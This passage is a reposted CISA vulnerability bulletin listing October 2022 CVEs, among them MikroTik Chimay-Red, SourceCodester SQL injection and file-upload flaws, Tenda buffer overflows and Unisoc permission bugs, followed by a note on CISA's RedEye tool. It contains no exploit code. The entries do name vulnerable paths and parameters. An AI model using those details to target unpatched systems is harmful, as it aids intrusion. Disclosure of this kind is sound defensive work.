L192](https://github.com/azure-rtos/usbx/blob/082fd9db09a3669eca3358f10b8837a5c1635c0b/common/usbx_host_classes/src/ux_host_class_pima_read.c#L192) can move data_pointer to unexpected address and cause write buffer overflow. The fix has been included in USBX release [6.1.12](https://github.com/azure-rtos/usbx/releases/tag/v6.1.12_rel). The following can be used as a workaround: Add check of `header_length`: 1. It must be greater than `UX_HOST_CLASS_PIMA_DATA_HEADER_SIZE`. 1. It should be greater or equal to the current returned data length (`transfer_request -> ux_transfer_request_actual_length`).	2022-10-13	not yet calculated	CVE-2022-39293 MISC CONFIRM
mikrotik — routeros	The Mikrotik RouterOS web server allows memory corruption in releases before Stable 6.38.5 and Long-term 6.37.5, aka Chimay-Red. A remote and unauthenticated user can trigger the vulnerability by sending a crafted HTTP request. An attacker can use this vulnerability to execute arbitrary code on the affected system, as exploited in the wild in mid-2017 and later.	2022-10-15	not yet calculated	CVE-2017-20149 MISC MISC
multiple_vendors — multiple_products	Programs which compile regular expressions from untrusted sources may be vulnerable to memory exhaustion or denial of service. The parsed regexp representation is linear in the size of the input, but in some cases the constant factor can be as high as 40,000, making relatively small regexps consume much larger amounts of memory. After fix, each regexp being parsed is limited to a 256 MB memory footprint. Regular expressions whose representation would use more space than that are rejected. Normal use of regular expressions is unaffected.	2022-10-14	not yet calculated	CVE-2022-41715 MISC MISC MISC MISC
nss — nss	A vulnerability found in nss. By this security vulnerability, nss client auth crash without a user certificate in the database and this can lead us to a segmentation fault or crash.	2022-10-14	not yet calculated	CVE-2022-3479 MISC MISC
october — october	October is a self-hosted Content Management System (CMS) platform based on the Laravel PHP Framework. This vulnerability only affects installations that rely on the safe mode restriction, commonly used when providing public access to the admin panel. Assuming an attacker has access to the admin panel and permission to open the “Editor” section, they can bypass the Safe Mode (`cms.safe_mode`) restriction to introduce new PHP code in a CMS template using a specially crafted request. The issue has been patched in versions 2.2.34 and 3.0.66.	2022-10-13	not yet calculated	CVE-2022-35944 CONFIRM
octopus_deploy — server	In affected versions of Octopus Server it is possible to use the Git Connectivity test function on the VCS project to initiate an SMB request resulting in the potential for an NTLM relay attack.	2022-10-14	not yet calculated	CVE-2022-2780 MISC
oxhoo_tp50 — oxhoo_tp50	An issue in OXHOO TP50 OXH1.50 allows unauthenticated attackers to access the administrative panel via browsing to the URL http://device_ip/index1.html.	2022-10-14	not yet calculated	CVE-2022-41436 MISC
perfact — openvpn-client	An attacker can take leverage on PerFact OpenVPN-Client versions 1.4.1.0 and prior to send the config command from any application running on the local host machine to force the back-end server into initializing a new open-VPN instance with arbitrary open-VPN configuration. This could result in the attacker achieving execution with privileges of a SYSTEM user.	2022-10-14	not yet calculated	CVE-2021-27406 CONFIRM
ree6 — ree6	Ree6 is a moderation bot. This vulnerability would allow other server owners to create configurations such as “Better-Audit-Logging” which contain a channel from another server as a target. This would mean you could send log messages to another Guild channel and bypass raid and webhook protections. A specifically crafted log message could allow spamming and mass advertisements. This issue has been patched in version 1.9.9. There are currently no known workarounds.	2022-10-14	not yet calculated	CVE-2022-39302 CONFIRM MISC
resistiot — iot_platform_+_lowrawan_network_server	SQL injection vulnerability in ResIOT IOT Platform + LoRaWAN Network Server through 4.1.1000114 via a crafted POST request to /ResiotQueryDBActive.	2022-10-13	not yet calculated	CVE-2022-34022 MISC
simple_cold_storage_management_system — simple_cold_storage_management_system	Simple Cold Storage Management System v1.0 is vulnerable to SQL Injection via /csms/classes/Master.php?f=delete_storage.	2022-10-14	not yet calculated	CVE-2022-42232 MISC
sourcecodester — online_birth_certificate_management_system	Online Birth Certificate Management System version 1.0 suffers from an Insecure Direct Object Reference (IDOR) vulnerability	2022-10-14	not yet calculated	CVE-2022-42067 MISC MISC
sourcecodester — online_birth_certificate_management_system	Online Birth Certificate Management System version 1.0 is vulnerable to Cross Site Request Forgery (CSRF).	2022-10-14	not yet calculated	CVE-2022-42070 MISC MISC
sourcecodester — online_birth_certificate_management_system	Online Birth Certificate Management System version 1.0 suffers from a Cross Site Scripting (XSS) Vulnerability.	2022-10-14	not yet calculated	CVE-2022-42071 MISC MISC
sourcecodester — online_tours_&_travels_management_system	Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /user/update_booking.php.	2022-10-14	not yet calculated	CVE-2022-41416 MISC
sourcecodester — sacco_management_system	Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/manage_borrower.php.	2022-10-14	not yet calculated	CVE-2022-41535 MISC
sourcecodester — sacco_management_system	Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/manage_user.php.	2022-10-14	not yet calculated	CVE-2022-41536 MISC
sourcecodester — sanitization_management_system	A vulnerability classified as problematic was found in SourceCodester Sanitization Management System 1.0. Affected by this vulnerability is an unknown functionality of the component Quote Requests Tab. The manipulation of the argument Manage Remarks leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-211015.	2022-10-15	not yet calculated	CVE-2022-3519 MISC
sourcecodester — sanitization_management_system	A vulnerability classified as problematic has been found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the component User Creation Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-211014 is the identifier assigned to this vulnerability.	2022-10-15	not yet calculated	CVE-2022-3518 MISC
sourcecodester — sanitization_management_system	A vulnerability was found in SourceCodester Sanitization Management System and classified as critical. This issue affects some unknown processing of the file /php-sms/?p=services/view_service. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-210839.	2022-10-14	not yet calculated	CVE-2022-3504 N/A N/A
sourcecodester — sanitization_management_system	A vulnerability was found in SourceCodester Sanitization Management System. It has been classified as problematic. Affected is an unknown function of the file /php-sms/admin/. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210840.	2022-10-14	not yet calculated	CVE-2022-3505 N/A N/A
sourcecodester — wedding_planner	Wedding Planner v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /Wedding-Management-PHP/admin/photos_add.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-14	not yet calculated	CVE-2022-41538 MISC
sourcecodester — wedding_planner	Wedding Planner v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /admin/users_add.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-14	not yet calculated	CVE-2022-41539 MISC
tenda — ac1200	Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x475dc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.	2022-10-13	not yet calculated	CVE-2022-41480 MISC MISC
tenda — ac1200	Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47de1c function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.	2022-10-13	not yet calculated	CVE-2022-41481 MISC MISC
tenda — ac1200	Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x4a12cc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.	2022-10-13	not yet calculated	CVE-2022-41483 MISC MISC
tenda — ac1200	Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47ce00 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.	2022-10-13	not yet calculated	CVE-2022-41485 MISC MISC
tenda — ac1200	Tenda AC1200 US_AC6V2.0RTL_V15.03.06.51_multi_TDE01 was discovered to contain a buffer overflow in the 0x47c5dc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.	2022-10-13	not yet calculated	CVE-2022-41482 MISC MISC
tenda — ac1900	Tenda AC1900 AP500(US)_V1_180320(Beta) was discovered to contain a buffer overflow in the 0x32384 function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.	2022-10-13	not yet calculated	CVE-2022-41484 MISC MISC
triangle_microworks — multiple_products	The Triangle Microworks IEC 61850 Library (Any client or server using the C language library with a version number of 11.2.0 or earlier and any client or server using the C++, C#, or Java language library with a version number of 5.0.1 or earlier) and 60870-6 (ICCP/TASE.2) Library (Any client or server using a C++ language library with a version number of 4.4.3 or earlier) are vulnerable to access given to a small number of uninitialized pointers within their code. This could allow an attacker to target any client or server using the affected libraries to cause a denial-of-service condition.	2022-10-11	not yet calculated	CVE-2022-38138 MISC
ucms — ucms	There is a file inclusion vulnerability in the template management module in UCMS 1.6	2022-10-14	not yet calculated	CVE-2022-42234 MISC
unisoc — multiple_products	In camera driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-38671 MISC
unisoc — multiple_products	In camera driver, there is a possible memory corruption due to improper locking. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-38690 MISC
unisoc — multiple_products	In cell service, there is a missing permission check. This could lead to local denial of service in cell service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-38677 MISC
unisoc — multiple_products	In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-38673 MISC
unisoc — multiple_products	In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-38672 MISC
unisoc — multiple_products	In gpu driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-38676 MISC
unisoc — multiple_products	In jpg driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-2984 MISC
unisoc — multiple_products	In messaging service, there is a missing permission check. This could lead to local denial of service in messaging service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-38687 MISC
unisoc — multiple_products	In messaging service, there is a missing permission check. This could lead to access unexpected provider in contacts service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-38697 MISC
unisoc — multiple_products	In messaging service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-38698 MISC
unisoc — multiple_products	In messaging service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39080 MISC
unisoc — multiple_products	In Gallery service, there is a missing permission check. This could lead to local denial of service in Gallery service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39103 MISC
unisoc — multiple_products	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-39105 MISC
unisoc — multiple_products	In Soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in Soundrecorder service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39107 MISC
unisoc — multiple_products	In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39109 MISC
unisoc — multiple_products	In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39111 MISC
unisoc — multiple_products	In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39112 MISC
unisoc — multiple_products	In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39113 MISC
unisoc — multiple_products	In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39114 MISC
unisoc — multiple_products	In Music service, there is a missing permission check. This could lead to local denial of service in Music service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39115 MISC
unisoc — multiple_products	In messaging service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39117 MISC
unisoc — multiple_products	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-39120 MISC
unisoc — multiple_products	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-39121 MISC
unisoc — multiple_products	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-39122 MISC
unisoc — multiple_products	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-39123 MISC
unisoc — multiple_products	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-39124 MISC
unisoc — multiple_products	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-39125 MISC
unisoc — multiple_products	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-39126 MISC
unisoc — multiple_products	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-39127 MISC
unisoc — multiple_products	In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.	2022-10-14	not yet calculated	CVE-2022-39128 MISC
unisoc — multiple_products	In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39108 MISC
unisoc — multiple_products	In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-39110 MISC
unisoc — multiple_products	In music service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-2985 MISC
unisoc — multiple_products	In music service, there is a missing permission check. This could lead to local denial of service in music service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-38679 MISC
unisoc — multiple_products	In soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-38670 MISC
unisoc — multiple_products	In soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-38669 MISC
unisoc — multiple_products	In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-38688 MISC
unisoc — multiple_products	In telephony service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.	2022-10-14	not yet calculated	CVE-2022-38689 MISC
webid — webid	A security issue was discovered in WeBid <=1.2.2. A Server-Side Request Forgery (SSRF) vulnerability in the admin/theme.php file allows remote attackers to inject payloads via theme parameters to read files across directories.	2022-10-14	not yet calculated	CVE-2022-41477 MISC
webpack — loader-utils	A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the url variable in interpolateName.js.	2022-10-14	not yet calculated	CVE-2022-37603 MISC MISC MISC
wolfssl — wolfssl	An issue was discovered in wolfSSL before 5.5.0. A fault injection attack on RAM via Rowhammer leads to ECDSA key disclosure. Users performing signing operations with private ECC keys, such as in server-side TLS connections, might leak faulty ECC signatures. These signatures can be processed via an advanced technique for ECDSA key recovery. (In 5.5.0 and later, WOLFSSL_CHECK_SIG_FAULTS can be used to address the vulnerability.)	2022-10-15	not yet calculated	CVE-2022-42961 MISC
wordpress — wordpress	Cross-site Scripting (XSS) – Stored in GitHub repository barrykooij/related-posts-for-wp prior to 2.1.3.	2022-10-14	not yet calculated	CVE-2022-3506 CONFIRM MISC
wordpress — wordpress	Sensitive Data Exposure in Villatheme ALD – AliExpress Dropshipping and Fulfillment for WooCommerce premium plugin <= 1.1.0 on WordPress.	2022-10-14	not yet calculated	CVE-2022-41623 CONFIRM CONFIRM
zoom — client_for_meetings	Zoom Client for Meetings for macOS (Standard and for IT Admin) starting with 5.10.6 and prior to 5.12.0 contains a debugging port misconfiguration. When camera mode rendering context is enabled as part of the Zoom App Layers API by running certain Zoom Apps, a local debugging port is opened by the Zoom client. A local malicious user could use this debugging port to connect to and control the Zoom Apps running in the Zoom client.	2022-10-14	not yet calculated	CVE-2022-28762 MISC
zoom — on-premise_meeting_connector_mmr	Zoom On-Premise Meeting Connector MMR before version 4.8.20220916.131 contains an improper access control vulnerability. As a result, a malicious actor in a meeting or webinar they are authorized to join could prevent participants from receiving audio and video causing meeting disruptions.	2022-10-14	not yet calculated	CVE-2022-28761 MISC
zoom — on-premise_meeting_connector_mmr	Zoom On-Premise Meeting Connector MMR before version 4.8.20220815.130 contains an improper access control vulnerability. As a result, a malicious actor could obtain the audio and video feed of a meeting they were not authorized to join and cause other meeting disruptions.	2022-10-14	not yet calculated	CVE-2022-28759 MISC
zoom — on-premise_meeting_connector_mmr	Zoom On-Premise Meeting Connector MMR before version 4.8.20220815.130 contains an improper access control vulnerability. As a result, a malicious actor could obtain the audio and video feed of a meeting they were not authorized to join and cause other meeting disruptions.	2022-10-14	not yet calculated	CVE-2022-28760 MISC

This product is provided subject to this Notification and this Privacy & Use policy.

alerts

CISA Releases RedEye: Red Team Campaign Visualization and Reporting Tool

Post author By admin
Post date October 14, 2022

Original release date: October 14, 2022

CISA has released RedEye, an interactive open-source analytic tool to visualize and report Red Team command and control activities. RedEye allows an operator to quickly assess complex data, evaluate mitigation strategies, and enable effective decision making.

For more information, CISA encourages users to review RedEye on GitHub and watch CISA’s RedEye tool overview video.

This product is provided subject to this Notification and this Privacy & Use policy.

Managed Security Services

Cyber Threat Intelligence

iDNA

SiON

About Us

Leadership

Advisors

Cyber Security Assessment

SOC Cost Calculator

Request a Dark Web Report

Cyber Security Threat Alerts

What is Incident Response?

SOC 2 Compliance

Cyber Security Definitions and Terminology

Cyber Security Jobs

Blog

Podcast

Instagram

LinkedIn

Twitter

High Vulnerabilities

Medium Vulnerabilities

Low Vulnerabilities

Severity Not Yet Assigned

High Vulnerabilities

Medium Vulnerabilities

Low Vulnerabilities

Severity Not Yet Assigned

High Vulnerabilities

Medium Vulnerabilities

Low Vulnerabilities

Severity Not Yet Assigned

Company

Our services

Resources

Partners

Cyber news

Weekly Newsletter

Subscribe to our weekly newsletter on cyber news and best practices!